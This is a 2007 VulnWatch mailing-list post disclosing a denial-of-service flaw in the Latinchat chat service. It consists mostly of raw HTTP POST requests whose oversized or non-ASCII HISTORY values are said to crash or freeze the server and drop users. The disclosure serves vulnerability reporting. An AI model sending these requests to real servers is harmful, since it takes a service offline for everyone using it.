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Re: [VulnWatch] Latinchat Denial Of Service
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- Subject: Re: [VulnWatch] Latinchat Denial Of Service
- From: d4rksoft <d4rksoft@xxxxxxxxxxx>
- Date: Sat, 7 Apr 2007 23:47:58 -0700 (PDT)
Today this vulnerability keeps on existing in latinchat but with certain
difference.Instead of request:
POST /JAVA HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)
Referer: http://www.disp004-org.latinchat.com
Content-length: 142
UserName=mynick&SessionID=C17d808043&TEMPLATE=2&RoomID=R29_6-1&HISTORY=999999999999999999999999999999999999999999999999999999999999999999999
the user is sending other request using ASCII characters, for example :
POST /JAVA HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)
Referer: http://www.disp004-org.latinchat.com
Content-length: 142
UserName=mynick&SessionID=C17d808043&TEMPLATE=2&RoomID=R29_6-1&HISTORY=ر«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±
by sending this request to the server, it will crash.
Another request that freezes the server has following aspect:
POST /IN HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)
Referer: http://www.disp004-org.latinchat.com
Content-length: 142
using this request the attacker can boot certain quantity of users at the
same time and the server remains frozen until the attacker does not stop
process of attack.And in this case it does not have a lot of importance that
we are going to put in variable of history
:HISTORY=ر«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±
or
HISTORY=999999999999999999999999999999999999999999999999999999999999999999999999999
the result will be the same
Researcher: Vitto Makarsky (d4rkv1rus)
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